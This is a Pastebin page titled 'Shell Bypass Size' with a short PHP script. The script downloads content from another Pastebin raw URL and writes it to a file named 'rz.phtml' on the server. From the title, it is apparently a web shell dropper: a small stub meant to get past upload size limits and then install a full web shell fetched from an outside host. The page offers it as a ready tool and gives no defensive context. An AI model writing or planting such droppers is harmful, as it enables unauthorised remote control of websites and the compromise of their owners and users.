Advertisement
rizky21id

Shell Bypass Size

Apr 28th, 2017
137
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.14 KB | None | 0 0
  1. <?php
  2.  
  3. $r0x = file_get_contents ('https://pastebin.com/raw/2H4zmbdK');
  4.  
  5. $fp = fopen ('rz.phtml','w');
  6. fwrite ($fp,$r0x);
  7. fclose ($fp);
  8.  
  9. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement